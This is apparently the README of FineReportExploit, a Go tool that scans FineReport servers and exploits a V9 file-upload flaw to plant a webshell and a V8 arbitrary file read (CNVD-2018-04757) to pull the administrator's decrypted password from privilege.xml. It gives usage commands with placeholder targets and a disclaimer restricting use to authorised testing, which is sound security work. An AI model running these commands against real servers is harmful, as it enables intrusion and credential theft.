Home

Awesome

FineReportExploit

基于go语言的帆软报表漏洞检测工具

编译

go build -o FineReportExploit main.go

漏洞扫描

./FineReportExploit VulScan -u http://xxx.xxx.xxx.xxx

漏洞利用

V9Getshell

帆软V9 文件上传漏洞

./FineReportExploit V9Getshell -u http://xxx.xxx.xxx.xxx -f 本地文件 -n 服务端文件名

CNVD201804757

帆软V8任意文件读取漏洞

./FineReportExploit CNVD201804757 -u http://xxx.xxx.xxx.xxx

如果存在漏洞,那么读取privilege.xml,返回管理员用户名和解密后的密码

免责声明

本工具仅面向合法授权的企业安全建设行为,如您需要测试本工具的可用性,请自行搭建靶机环境。 如您在使用本工具的过程中存在任何非法行为,您需自行承担相应后果。